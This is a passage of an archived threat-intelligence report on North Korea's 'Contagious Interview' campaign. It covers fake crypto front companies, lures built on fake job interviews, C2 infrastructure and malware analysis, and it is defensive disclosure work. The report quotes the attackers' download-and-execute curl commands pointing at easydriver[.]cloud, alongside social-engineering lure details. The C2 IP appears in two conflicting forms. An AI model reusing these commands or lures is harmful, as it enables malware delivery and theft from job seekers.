{
	"id": "79e79242-48e6-466a-9b23-b25c8a51b4f4",
	"created_at": "2026-04-06T00:07:42.825146Z",
	"updated_at": "2026-04-10T13:12:49.979521Z",
	"deleted_at": null,
	"sha1_hash": "0584b033a3b4ad06fdf8a1b26249314ffda17a60",
	"title": "Contagious Interview (DPRK) Launches a New Campaign Creating Three Front Companies to Deliver a Trio of Malware: BeaverTail, InvisibleFerret, and OtterCookie",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 28889019,
	"plain_text": "Contagious Interview (DPRK) Launches a New Campaign\r\nCreating Three Front Companies to Deliver a Trio of Malware:\r\nBeaverTail, InvisibleFerret, and OtterCookie\r\nBy Gareth Howells\r\nPublished: 2025-04-24 · Archived: 2026-04-05 15:42:45 UTC\r\nJoin our threat analysts for our Contagious Interview threat webinar on June 10:\r\nKey Findings\r\nSilent Push Threat Analysts have uncovered three cryptocurrency companies that are actually fronts for the\r\nNorth Korean advanced persistent threat (APT) group Contagious Interview: BlockNovas LLC, Angeloper\r\nAgency, and SoftGlide LLC.\r\nOur malware analysts confirmed that three strains, BeaverTail, InvisibleFerret, and OtterCookie, are being\r\nused to spread malware via “interview malware lures” to unsuspecting cryptocurrency job applicants.\r\nThe threat actor heavily utilizes AI-generated images to create profiles of “employees” for the three front\r\ncrypto companies, employing “Remaker AI” (remaker[.]ai) for some of the AI-generated images.\r\nAs part of the crypto attacks, the threat actors are heavily using GitHub, job listings, and freelancer\r\nwebsites.\r\nExecutive Summary\r\nSilent Push Threat Analysts recently identified and mapped out a new campaign linked to the North Korean APT\r\ngroup Contagious Interview. Also known as “Famous Chollima,” Contagious Interview is a subgroup of the North\r\nKorean state-sponsored APT group, Lazarus.\r\nContagious Interview has a history of launching sophisticated cyberattacks targeting individuals and organizations\r\nworldwide. In this new campaign, the threat actor group is using three front companies in the cryptocurrency\r\nconsulting industry—BlockNovas LLC (blocknovas[.] 
com), Angeloper Agency (angeloper[.]com), and SoftGlide\r\nLLC (softglide[.]co)—to spread malware via “job interview lures.”\r\nOur malware analysts have also confirmed that three different strains of malware are being spread from this\r\ninfrastructure: BeaverTail, InvisibleFerret, and OtterCookie, to unsuspecting cryptocurrency job applicants. \r\nDisclaimer: After being contacted by an individual claiming the threat actors referenced in this blog had stolen\r\ntheir identity, we have removed all references to them at their request.\r\nTable of contents\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 1 of 71\n\nKey Findings\r\nExecutive Summary\r\nBackground\r\nResearch Methodology\r\nInitial InvisibleFerret Malware Sample Associated with BeaverTail\r\nInvestigating lianxinxiao[.]com, a BeaverTail C2 Domain\r\nDNS Records for lianxinxiao[.]com Reveal a New Domain\r\nBlockNovas[.]com Infrastructure \u0026 Initial Ties to BeaverTail\r\nBlockNovas’ Mail Subdomain Hosting Dashboard Seen Monitoring Suspected BeaverTail Websites\r\nBlockNovas Mail Subdomain Hosting Hashtopolis, a Password Cracking Utility\r\nInvestigating Blocknovas[.]com, Numerous Red Flags\r\nBlockNovas LLC Business Registration Address: An Abandoned Lot in South Carolina, Principals\r\nNamed\r\nBlocknovas[.]com Business Details\r\nBlockNovas Website Claims Raise Significant Questions\r\nTracking Victims of the BlockNovas BeaverTail Malware Campaign\r\nGitlab.Blocknovas[.]com Hosting JS File Referencing the Golang Backdoor Frostyferret\r\nMisconfiguration Reveals a New Domain: apply-blocknovas[.]site\r\nInvestigating the Fake Interview Job Flow on “apply-blocknovas[.]site”\r\nAnalyzing the Malicious FrostyFerret Payload “nvidia-rc.update.zip”\r\nGolang Backdoor\r\nInvestigating the C2 Domain “camdriversupport[.]com”\r\nInvestigating BlockNovas’ GitHub Infrastructure\r\nBlockNovas Malware Analysis – Stage 1\r\nBlockNovas Malware Analysis – Stage 2: BeaverTail Malware 
Confirmation\r\nBlockNovas Malware Analysis – Stage 3: InvisibleFerret Main Stage\r\nBlockNovas Malware Analysis – Stage 4A: InvisibleFerret Payload Component\r\nBlockNovas BeaverTail Malware Analysis – Stage 4B: InvisibleFerret Browser Stealer Component\r\nNew lianxinxiao[.]com Panel Interface\r\nAdditional BlockNovas “Skill Assessment” Websites, New Cloudflare Obfuscation\r\nBlockNovas Skill Assessment GitHub Pivots from MongoDB Lead to “OtterCookie” Malware on\r\nserver[.]attisscmo[.]com\r\nNew Contagious Interview Tool “Kryptoneer” Found on attisscmo[.]com, Mysterious Connections to Sui\r\nBlockchain\r\nlianxinxiao[.]com and attisscmo[.]com Share “Decryption Failed” Response on C2 Port 8000\r\nBlockNovas Employee Analysis \u0026 Pivots\r\nBlockNovas LinkedIn Employees\r\nSuspected Fake Persona: Mehmet Demir\r\nMehmet Demir aka “Bigrocks918” Connected to Three Likely Contagious Interview Front\r\nCompanies: BlockNovas, Angeloper, and SoftGlide\r\nAngeloper[.]com Ties to BeaverTail Malware and Bigrocks918 Persona\r\nSoftGlide LLC Ties to Other Contagious Interview Infrastructure and Users\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 2 of 71\n\nBlockNovas Recruiter Alexander Nolan: A Known Fake\r\n“Individual A”: Likely Fake BlockNovas Developer\r\nContinuing to Track North Korean Threat Actors “Contagious Interview” Campaigns\r\nMitigation\r\nRegister for Community Edition\r\nSample Contagious Interview IOFA TM List\r\nBackground\r\nAs referenced above, Contagious Interview has been implicated in sophisticated cyber-espionage campaigns\r\ntargeting various industries, including technology and cryptocurrency sectors.\r\nContagious Interview threat actors’ tactics often involve social engineering. Our team found that they use fake job\r\noffers to distribute malware, such as BeaverTail, InvisibleFerret, and OtterCookie, to enable remote access and\r\ndata theft. 
Contagious Interview has utilized services like Astrill VPN and residential proxies to obfuscate their\r\ninfrastructure and activities, making detection more challenging. Our team has observed a new tactic that heavily\r\nutilizes AI-generated images.\r\nOur team initially identified an unusual configuration for BeaverTail malware in a sample available on VirusTotal.\r\nThrough several technical fingerprints, we identified a domain, lianxinxiao[.]com, that was observed to be both a\r\ncommand and control (C2) and staging server for BeaverTail and InvisibleFerret malware. The BeaverTail\r\nmalware we analyzed maintained persistence for all three desktop operating systems: Linux, macOS, and\r\nWindows.\r\nThrough open-source intelligence (OSINT), our team found victim stories referencing the “lianxinxiao” domain,\r\nwhich was also present in the malicious code we found after deobfuscating the BeaverTail and InvisibleFerret\r\nmalware.\r\nOur threat analysts were able to document fake job interview flows within the BlockNovas infrastructure and\r\nconnect multiple GitHub repositories associated with this scheme.\r\nWe also confirmed multiple victims of the Contagious Interview campaign, specifically via BlockNovas, the most\r\nactive front company. One of the alleged fake personas was even seen performing “gig development work,”\r\nalthough it’s unclear if they abused their access during these gigs. \r\nThe BlockNovas front company has 14 people allegedly working for them, however many of the employee\r\npersonas our team researched appear to be fake.\r\nAdditionally, on a BlockNovas subdomain, we were able to briefly access and archive details showing a “Status\r\nDashboard” where the threat actor group was maintaining visibility on four of their domains and several other\r\nservices. 
A separate BlockNovas subdomain was found hosting “Hashtopolis,” an open-source, distributed\r\npassword cracking management system.\r\nNorth Korean APTs are known to be persistent with their social engineering techniques. The following sites were\r\nfound to be used by Contagious Interview to lure victims focused on hiring, freelancing, or recruitment:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 3 of 71\n\nCryptoJobsList[.]com\r\nCryptoTask[.]org\r\nGetOnBrd[.]com\r\nGuru[.]com\r\nFreelancer[.]com\r\nIntch[.]org\r\nJobatus[.]pt\r\nSignalHire[.]com\r\nThirdwork[.]xyz\r\nUpwork[.]com\r\nResearch Methodology\r\nSilent Push researchers want to publicly share some of our findings to empower defenders on Contagious\r\nInterview’s attack methods and how to mitigate them.\r\nMany of the employees who work for BlockNovas and within the cluster of Contagious Interview companies\r\nappear to be fake.\r\nWhile it is impossible to prove that all the employees are bogus, as some may be working in various support jobs.\r\nWe will highlight some of the red flags our team has identified without delving too deeply into the process.\r\nNote: Silent Push TLP: Amber reports provide details on our research exclusively for our Enterprise customers.\r\nFor reasons of operational security and to prevent threat actors from learning about how we track their mistakes,\r\nwe are unable to reveal all our pivots in a public-facing blog.\r\nInitial InvisibleFerret Malware Sample Associated with BeaverTail\r\nSilent Push Threat Analysts found an InvisibleFerret malware sample in VirusTotal, which had been detected as\r\nBeaverTail by several companies, including Microsoft.\r\nSince this file is actually Python malware, it is essential to distinguish it from InvisibleFerret, which is associated\r\nwith BeaverTail malware, rather than BeaverTail itself.\r\nAs described by Malpedia, “BeaverTail is a JavaScript malware primarily distributed through NPM packages. 
It is\r\ndesigned for information theft and to load further stages of malware, specifically a multi-stage Python-based\r\nbackdoor known as InvisibleFerret.”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 4 of 71\n\nWe used VirusTotal to confirm the “main_empOQO[.]py” file’s activity\r\nUsing VirusTotal, we confirmed that the main_empOQO.py file was seen contacting the domain lianxinxiao[.]com\r\nas early as December 2024 and continued until March 2025. The C2 server remains active at the time of writing.\r\nhxxps://www.virustotal[.]com/gui/domain/lianxinxiao[.]com/relations\r\nSince most BeaverTail and InvisibleFerret samples observed in the wild do not use domains but instead contact\r\nthe C2 server directly via a hard-coded IP address, we decided to investigate the C2 domain lianxinxiao[.]com\r\nfurther.\r\nInvestigating lianxinxiao[.]com, a BeaverTail C2 Domain\r\nSilent Push Threat Analysts began by analyzing the BeaverTail C2 domain, which was identified through the\r\nprevious malware pivot.\r\nSince August 12, 2024, the domain lianxinxiao[.]com has resolved to 37.211.126[.]117 on AS44477 Stark\r\nIndustries Solutions LTD.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 5 of 71\n\nSilent Push Total View for lianxinxiao[.]com\r\nKnowing that the infrastructure was still online, we scanned for public directories or files.\r\nNavigating to lianxinxiao[.]com:5000/client allowed us to download an obfuscated Python script commonly seen\r\nin the follow-up step of a BeaverTail infection: InvisibleFerret.\r\nThe details below were captured in early March 2025.\r\nObfuscated InvisibleFerret script lianxinxiao[.]com\r\nDNS Records for lianxinxiao[.]com Reveal a New Domain\r\nOur Analysts discovered that the TXT and MX records* from lianxinxiao[.]com included another domain:\r\nblocknovas[.]com.\r\nTXT records from lianxinxiao[.]com referencing blocknovas[.]com via Total 
View\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 6 of 71\n\nMX records from lianxinxiao[.]com referencing blocknovas[.]com via Total View\r\n*Note: MX records contain the mail server(s) used by a given hostname to receive email. The Sender Policy\r\nFramework (SPF) utilizes TXT records to specify which IP addresses are authorized to send email on behalf of a\r\nhostname. TXT records have other uses as well, including domain and SSL verification.\r\nThe records that referenced the blocknovas[.]com domain had been live the entire time the domain\r\nlianxinxiao[.]com was seen spreading BeaverTail malware. This raised questions about the purpose of the\r\nblocknovas[.]com domain.\r\nThe blocknovas[.]com domain had 5 subdomains configured and hosted on different ASNs.\r\nThe details can be viewed by using our Silent Push Explore DNS Data feature for *.blocknovas[.]com.\r\nThe subdomains were:\r\nbookings[.]xxx\r\nchat[.]xxx\r\ngitlab[.]xxx\r\nmail[.]xxx\r\napply[.]xxx\r\nSubdomain IP ASN\r\nmail[.]blocknovas[.]com 167.88.39[.]141 AS47583 AS-HOSTINGER, CY\r\nbookings[.]blocknovas[.]com 136.143.190[.]199 AS2639 ZOHO-AS, US\r\ngitlab[.]blocknovas[.]com\r\nchat[.]blocknovas[.]com\r\n86.104.74[.]169\r\nAS44477 STARK-INDUSTRIES, GB\r\napply[.]blocknovas[.]com\r\n188.114.96.2 /\r\n188.114.97.2\r\n(Same as apex domain)\r\nAS13335 Cloudflare\r\nBlockNovas’ Mail Subdomain Hosting Dashboard Seen Monitoring Suspected BeaverTail\r\nWebsites\r\nThe domain mail[.]blocknovas[.]com had ports 3001 and 4200 open, exposing two different services.\r\nThe first port, 3001, exposed a dashboard to track the service level of specific websites or products.\r\nOn the dashboard hosted on mail[.]blocknovas[.]com, we were able to capture them tracking the following:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 7 of 71\n\nlianxinxiao[.]com – the domain seen spreading BeaverTail malware via VirusTotal\r\nBlocknovas\r\nBlocknovas 
Gitlab\r\nBlocknovas Chat\r\nBlocknovas Mail\r\nAngeloperonline” – determined to be angeloperonline[.]online, another domain used by this group, further\r\ndescribed below.\r\nSoftglide[.]co – This was another tech consulting company, similar to the BlockNovas part of the scheme;\r\nmore details are provided below.\r\nmail[.]blocknovas[.]com:3001/status/blocknovas\r\nThis dashboard tied the three different companies and their products together, along with a malware staging and\r\nC2 domain. This was a significant OPSEC failure by Contagious Interview.\r\nBlockNovas Mail Subdomain Hosting Hashtopolis, a Password Cracking Utility\r\nThe second port exposed on the mail.blocknovas[.]com domain – port 4200 – recently hosted Hashtopolis – an\r\nopen-source password-cracking utility.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 8 of 71\n\nmail[.]blocknovas[.]com:4200\r\nInvestigating Blocknovas[.]com, Numerous Red Flags\r\nBlocknovas[.]com was registered in July 2024 via NameCheap and immediately added name server records from\r\nCloudflare.\r\nWe cover the infrastructure in more detail below; however, we will first outline the business details and claims as\r\npresented on the website.\r\nBlocknovas[.]com site\r\nBlockNovas LLC Business Registration Address: An Abandoned Lot in South Carolina,\r\nPrincipals Named\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 9 of 71\n\nOur analysts confirmed that the company “BlockNovas LLC” was registered (Bizapedia) in New Mexico, with the\r\nRegistered Agent details listed as “United States Corporation Agents, Inc.,” which is a service used by LegalZoom\r\nfor business registration.\r\nThe company address was listed as 2001 Augusta Rd, Warrenville 29851, SC, USA, which was also used as the\r\naddress for all “Members and Organizers”:\r\nBlockNovas LLC company registration listing “Ramon Mckenzie” and “Mehmet Demir,” and other\r\nbusiness details 
hxxps://www.bizapedia[.]com/nm/blocknovas-llc.html\r\nWhen searching the company address on Google Maps Street View, it does not seem to be a location where an\r\noffice or company was operating.\r\nThis street view photo was taken in February 2024:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 10 of 71\n\n2001 Augusta Rd, Warrenville, SC – Feb. 2024 – Google Maps\r\nThe business registration details also included two company contacts:\r\nMehmet Demir\r\nRamon Mckenzie\r\nBoth of these names are likely tied to fake personas, as further detailed below.\r\nBlocknovas[.]com Business Details\r\nOther information about the organization included:\r\nWebsite: Blocknovas[.]com\r\nPhone: +1 (925) 953-2975\r\nEmail: contact@blocknovas[.]com\r\nCalendly Link: calendly[.]com/contact-blocknovas/30min\r\nAdditionally, BlockNovas had a presence on several social media platforms and services:\r\nLinkedIn: linkedin[.]com/company/blocknovas/\r\nMore details about employees found via LinkedIn are included below.\r\nPinterest: pinterest[.]com/blocknovas/\r\nOn Pinterest, the same phone number used on the website was shared (+1) (925) 953-2975.\r\nA unique email address was shared: “kisikbo5.werer@gmail[.]com”\r\nTwitter: x[.]com/blocknovasllc (Joined October 2024)\r\nTheir Twitter account posted about a “Senior Blockchain Developer” job on November 1, 2024.\r\nBoth the link and the job posting page were captured on the Wayback Machine.\r\nAlso on November 1, 2024, they tweeted a link to a Medium article “Cryptocurrency Market\r\nTrends: A Glimpse into the Future” (broken capture in Wayback Machine due to Medium archiving\r\ndefenses)\r\nName of author of the article from BlockNova: “Ramon Mckenzie”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 11 of 71\n\nEmail address associated with the Medium account “ramon.tech@blocknovas[.]com”\r\n(Source)\r\nMore details on the Ramon Mckenzie persona are included later in the 
report.\r\nBlockNovas’ LinkedIn account with “Ramon Mckenzie” persona hxxps://medium[.]com/blocknovas\r\nFacebook facebook[.]com/blocknovas/ – page created on October 3, 2024\r\nThe “Blocknovas” Facebook “About” profile page\r\nThe BlockNovas Facebook page posted a link to the same job posting page that was promoted on Twitter – hosted\r\non blocknovas.zohorecruit[.]com on the same day, November 1, 2024.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 12 of 71\n\nThe Facebook page also featured the same address, “2001 Augusta Rd, Warrenville, SC 29851,” that was\r\ndisplayed in the footer of the BlockNovas website.\r\nBlockNovas’ Facebook page featured the same address as the BlockNovas’ website\r\nBlockNovas Website Claims Raise Significant Questions\r\nWhen viewing the “About Us” page of blocknovas[.]com via the Wayback Machine, the group claimed to have\r\nbeen operating for “12+ years,” – which is 11 years longer than the business has been registered:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 13 of 71\n\nThe BlockNovas “About Us” page found on the Wayback Machine\r\nThey also claimed to have 20+ team members and 53+ completed projects.\r\nThe “About” page features “Our Team” photos with staff names, with at least one photo impersonating a real\r\nperson and likely others doing the same:\r\nJaime John – Human Resource (Confirmed Impersonating “Alejandro Borgonovo” from RAMP, Image\r\nSource, Direct Image Link)\r\nImogen Jonson – Business Manager (Appears to be impersonating “Ally Kendall” from “Culture Amp”\r\nSource)\r\nJim Allen – PM (Unclear impersonation)\r\nAleksandr Karelin – CTO (Unclear impersonation)\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 14 of 71\n\nhxxps://web.archive.org/web/20250404212159/hxxps://www.blocknovas.com/about-us\r\nThe BlockNovas Portfolio page (Wayback Machine) links to 20 companies they claimed to have worked 
with,\r\nincluding:\r\n1. Poloniex – poloniex[.]com\r\n2. Phemex – phemex[.]com\r\n3. LAtoken – latoken[.]com\r\n4. Marqeta – marqeta[.]com\r\n5. Oasis Pro Markets – oasispromarkets[.]com\r\n6. Hive – hive[.]com\r\n7. Godex – godex[.]io\r\n8. NobleBlocks – nobleblocks[.]com\r\n9. Future Exchange – futureexchange[.]io\r\n10. Flip[.]gg – flip[.]gg\r\n11. BitValve – bitvalve[.]com\r\n12. Arabian Camels – arabiancamels[.]io\r\n13. The Keepers Insurance – nftkeepers[.]io\r\n14. Kaisa – kaisa[.]io\r\n15. Smartwhales – smartwhales[.]ai\r\n16. Crypto Hunter – hunt-crypto[.]com\r\n17. Olive \u0026 Chain – oliveandchain[.]com\r\n18. Henry K. Diamonds – henrykdiamonds[.]com\r\n19. Your Bijoux Box – yourbijouxbox[.]com\r\n20. All Purpose Creams – allpurposecreams[.]com\r\nThe blocknovas[.]com footer included links to their social channels and a banner that alluded to their work with\r\nIkea, Vodafone, BlockFi, and “Nia” (an exercise brand from Oregon).\r\nExample of the BlockNovas page with social links and footer\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 15 of 71\n\nExternal marketing pages from job placement services like “Welcome to the Jungle,” which promotes\r\nBlockNovas, also claimed they worked with Ikea and Vodafone:\r\nBlocknovas’ profile on the “Welcome to the Jungle” job portal\r\nTracking Victims of the BlockNovas BeaverTail Malware Campaign\r\nSilent Push Analysts took our initial leads into the BlockNovas campaign and were able to identify two developers\r\ntargeted by the campaign; one of them allegedly had their MetaMask wallet compromised.\r\nThe first public victim, “topninja,” posted on September 18, 2024, on dev[.]to, detailed how a job offer turned into\r\na wallet compromise:\r\n“I wanted to share how my MetaMask wallet was hacked yesterday as a cautionary tale.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 16 of 71\n\nI received a new project through Freelancer.com. 
The client had a ‘payment verified’ badge, so I assumed they\r\nwere legitimate. The project involved web3 backend development, which I was confident I could handle.\r\nAfter accepting the contract, the client invited me to their GitLab project and asked me to run their backend code.\r\nSoon after running it, I realized that my MetaMask wallet had been compromised. Fortunately, I didn’t lose much\r\nmoney, but I want to warn everyone to be cautious when running new code on your machine.\r\nAfter analyzing the code, I discovered that it downloads and executes a script file. I’ve attached the code here.”\r\nTopninja shared the malicious code, which included a request to the known BeaverTail distributing domain\r\nlianxinxiao[.].com:\r\nhxxps://dev[.]to/topninja/i-hacked-web3-wallet-15e4\r\nAnother developer named Junaid Khan was targeted in this same campaign, and shared details just days later on\r\nLinkedIn on September 23, 2024\r\nKhan was asked to perform a contractor skill assessment by accessing code on a BlockNovas subdomain\r\n(gitlab[.]blocknovas[.]com) posted by a BlockNovas employee named “Ramon Mckenzie” (the same name seen\r\non BlockNovas business registration documents). Khan quickly identified the code as malicious.\r\nHe described additional details about the lure:\r\nI received a job invitation from a client asking me to make some “minor changes” to an existing project as part of\r\na test assessment. They provided me with a repository link: hxxps://gitlab.blocknovas[.]com/super/nyx1.2upgrade-test-public\r\nOn the surface, everything seemed legit. The changes they requested appeared to be minor tweaks to the\r\nJavaScript code. However, once I ran the provided code, I quickly realized something far more dangerous was\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 17 of 71\n\nhappening under the hood.\r\nThe Issue:\r\nThe code includes an eval() function vulnerability in JavaScript. 
For those unfamiliar, eval() can execute arbitrary\r\ncode within the running program, making it extremely dangerous when used without proper sanitation. This\r\nspecific instance allows the client to run arbitrary and potentially malicious code on your system without your\r\nknowledge or consent.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 18 of 71\n\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 19 of 71\n\nJunaid Khan warning for Ramon Mckenzie – BlockNovas lure\r\nSilent Push Threat Analysts were able to access the GitLab account that was spreading the malicious code shared\r\nfrom Junaid Khan’s LinkedIn post.\r\nThe “Ramon Mckenzie” (atypical spelling for “McKenzie”) persona can be seen on the account:\r\nMalicious repository previously hosted on gitlab.blocknovas[.]com/rmadmin/ncipher1.2upgrade-backend\r\nGitlab.Blocknovas[.]com Hosting JS File Referencing the Golang Backdoor Frostyferret\r\nApril 2025: The root of gitlab.blocknovas[.]com was still hosted in a JavaScript file that contained all the details\r\nin the fake interview flow and included the C2 domain, which deployed malware (also seen on other fake\r\ninterview domains used in this campaign).\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 20 of 71\n\nview-source:hxxps://gitlab.blocknovas[.]com/\r\nWithin the JS file, strings could be found that clearly referenced the fake interview campaign:\r\n“Join Blocknovas”\r\n“In the next step, you will be asked to create a short video introduction of yourself, so please be prepared to\r\nshare a little about your background and why you’re interested in this role. Make sure you’re in a quiet\r\nenvironment and ready to focus.”\r\n“We will review your application carefully. Take a break and have a coffee, We’ll get in touch with you\r\nsoon to let you know the status.”\r\n“In-depth discussion about your experience and skills. 
The goal of this interview is for us to get to know\r\nyou, your background, and experience better, and for you to ask any questions you may have.”\r\nAnd a series of strings asked about English proficiency:\r\n“I can interact in a simple way, if the other person talks slowly and is able to cooperate.”\r\n“I can explain my decisions and understand most instructions, in both text and speech. I occasionally need\r\nthings to be repeated so I can understand.”\r\n“I understand and use complex speech and text, including technical topics in my field. I can speak\r\nspontaneously, without causing strain for myself or others.”\r\n“I can easily understand almost everything I hear or read, and speak confidently using finer shades of\r\nmeaning in complex situations.”\r\nThen the malicious shell commands to connect to their C2 hosted on “easydriver[.]cloud” were included for\r\nWindows, Mac, and Linux:\r\nreturn `curl -k -o /var/tmp/nvidia_update.sh hxxps://easydriver[.]cloud/nvidia-nx.update/${l} \u0026\u0026 chmod +x /var/\r\nreturn `curl -k -o /var/tmp/nvidia_mac.sh hxxps://easydriver[.]cloud/nvidia-mac.update/${l} \u0026\u0026 chmod +x /var/tm\r\nreturn `curl -k -o \"%TEMP%\\\\nvidiaupdate.zip\" hxxps://easydriver[.]cloud/nvidia-rc.update/${l} \u0026\u0026 powershell -C\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 21 of 71\n\nreturn `curl -k -o \"%TEMP%\\\\nvidiaupdate.zip\" hxxps://easydriver[.]cloud/nvidia-rc.update/${l} \u0026\u0026 powershell -C\r\nSimilar text strings found within the JavaScript on gitlab.blocknova[.]com were also detected on a live BeaverTail\r\nfake interview domain.\r\nMisconfiguration Reveals a New Domain: apply-blocknovas[.]site\r\nOn March 5, 2025, Silent Push analysts connected to the gitlab.blocknovas[.]com domain and received an SSL\r\nerror, which referenced an entirely new domain referencing the BlockNovas brand:\r\napply-blocknovas[.]site\r\nThe domain apply-blocknovas[.]site also pointed to the earlier 
mentioned IP address: 86.104.74[.]169.\r\nScreenshot of an SSL error on gitlab.blocknovas[.]com referencing the domain “apply-blocknovas[.]site”\r\nInvestigating the Fake Interview Job Flow on “apply-blocknovas[.]site”\r\nAfter our threat analysts found the SSL error on gitlab.blocknovas[.]com referencing the above domain, the shared\r\nbrand name in the domain and SSL certificate indicated this was new infrastructure from the same threat actor.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 22 of 71\n\nWe analyzed the content on the new apply-blocknovas[.]site domain and further connected it via the same\r\nlanguage and strings seen previously in the JavaScript file on the root of gitlab.blocknovas[.]com.\r\nThe root hosted a job application form for a crypto company—the same type of lure seen in previous “Contagious\r\nInterview” phishing flows. The first step of the application includes a checkbox asking the applicant to consent to\r\n“the use of call recording, note-taking tools and external assessment tools,” which helped prime the future video\r\ninterview lure.\r\n“Apply for Exciting Opportunities in Blockchain and Crypto” from apply-blocknovas[.]site\r\nThe next step requested location information and included a testimonial from “Alice Johnson, CEO, FinTech\r\nInnovations Ltd.” Several image analysis tools indicated that this face was likely AI-generated, and there was no\r\nindication of an actual person with this name or a company with this name.\r\n“Where are you based?” from apply-blocknovas[.]site/location\r\nThe next step asked for the amount of experience the applicant had as a professional crypto trader:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 23 of 71\n\nThe site asked the applicant, “How much full-time, professional experience do you have in CRYPTO\r\nTRADER?”\r\nAn additional question about work obligations encouraged the applicant with, “Create more impact with a 
full-time commitment.”\r\n“What type of commitment do you prefer?” from apply-blocknovas[.]site\r\nThen a question posed, “What’s your English level?” had the exact same language seen in the JavaScript on\r\ngitlab.blocknovas[.]com:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 24 of 71\n\nAn applicant was asked, “What’s your English level?” from apply-blocknovas[.]site\r\nThe next step requested a written response to “Describe your experience in business development” to further\r\nengage the applicant’s commitment in the process. It also asked, “What industries or sectors have you primarily\r\nworked in, and what types of companies have you worked with?”\r\nThe request for information about companies an applicant had worked with could be useful for a threat actor\r\ndeploying malware onto an applicant’s device, and who wanted to know what credentials of the job seeker could\r\nbe exposed.\r\nThe applicant was then asked, “Describe your experience in business development”\r\nThe final step before the malware lure was deployed requested social and website links:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 25 of 71\n\nThe applicant was then asked, “Can you add your links?” from apply-blocknovas[.]site/links\r\nBlockNovas then deployed a classic “Record Your Video Introduction” lure used by Contagious Interview with\r\ndetails such as:\r\n“What excites you the most about the future of blockchain technology and its potential impact on\r\nindustries?”\r\n“Keep your introduction between 1-3 minutes”\r\n“Ensure good lighting and clear audio”\r\n“Briefly introduce yourself and your background”\r\n”Mention your key skills and experience”\r\n“Explain why you’re interested in this position”\r\nCTA buttons include “Record Now”, “Record Again”, “Download”, and “Upload”\r\nThe classic lure was then posed to the applicant: “Record Your Video Introduction”\r\nIf the job-seeker, also known as the intended 
victim, clicked any of the call-to-action buttons, a pop-up would\r\nappear with an “Access to your camera or microphone is currently blocked” message along with a “ClickFix”\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 26 of 71\n\ncopy-and-paste lure. If the command prompted by the lure was executed on a Windows, Mac, or Linux device, it\r\nwould execute the malware.\r\nText in the pop-up had slight variations for different devices; the Windows prompt is featured below:\r\n“Access to your camera or microphone is currently blocked” pop-up from apply-blocknovas[.]site/video-intro\r\nAnalyzing the Malicious FrostyFerret Payload “nvidia-rc.update.zip”\r\nSilent Push Threat Analysts acquired the payload being served via apply-blocknovas[.]site and were able to\r\nconnect it to other known infrastructure from Contagious Interview.\r\nThe file was retrieved via the previous site, “nvidia-rc.update.zip,” which contained the following files:\r\nupdate.vbs, nvidia.js, npx.cmd, npx, nmp.cmd, npm, nodevars.bat, node.exe, install_tools.bat,\r\ncorepack.cmd, corepack\r\nThe “Date Modified” for several of these files dates back as early as June 26, 2023, with other significant updates\r\nin May and November of 2024—this could provide an indication of when the Contagious Interview scheme was\r\nbeing developed.\r\nSome of the files within the directory were most likely legitimate Node JS files and dependencies, so not all files\r\nhere should be considered malicious without further investigation.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 27 of 71\n\nFile contents from “nvidia-rc.update.zip” downloaded from “apply-blocknovas[.]site”\r\nAnalyzing the file “nvidia[.]js”, two URLs embedded in the file were discovered:\r\nhxxps://api.camdriversupport[.]com/nvidiawin.update\r\nhxxps://easydriver[.]cloud/nvidiawin.update\r\nnvidia.js from easydriver[.]cloud\r\nGolang Backdoor\r\nThe 
easydriver[.]cloud/nvidiawin[.]update file path, when accessed, resulted in the download of a new file, “nvidiawin[.]update[.]zip”.
Downloading “nvidiawin[.]update[.]zip” from easydriver[.]cloud/nvidiawin.update
Unpacking “nvidiawin[.]update[.]zip” revealed the following files and folders:
Files and folders revealed in nvidiawin[.]update[.]zip
On further investigation of the files, we discovered that the file “nvidiaupdate[.]go” contained a C2 configuration for the IP address “37.221.126[.]117:8000.” We saw a similar file structure in our previous reporting, referenced here: North Korea-nexus Golang Backdoor/Stealer from Contagious Interview campaign | dmpdump, where the Golang Backdoor was also seen.
The IP address is the same one that hosts lianxinxiao[.]com, a domain that spreads BeaverTail and which has been mapped to the dedicated IP 37.221.126[.]117 since August 12, 2024.
The domain lianxinxiao[.]com had 11 detections in VirusTotal:
However, the dedicated IP address that had been hosting the lianxinxiao[.]com domain for months, and was also hardcoded as a C2 within the malware, had 0 detections in VirusTotal. A detection count of zero says nothing about the IP being benign; an address hardcoded as a C2 is an indicator regardless.
Investigating the C2 Domain “camdriversupport[.]com”
The malicious payload from “apply-blocknovas[.]site” exposed the above C2 domain.
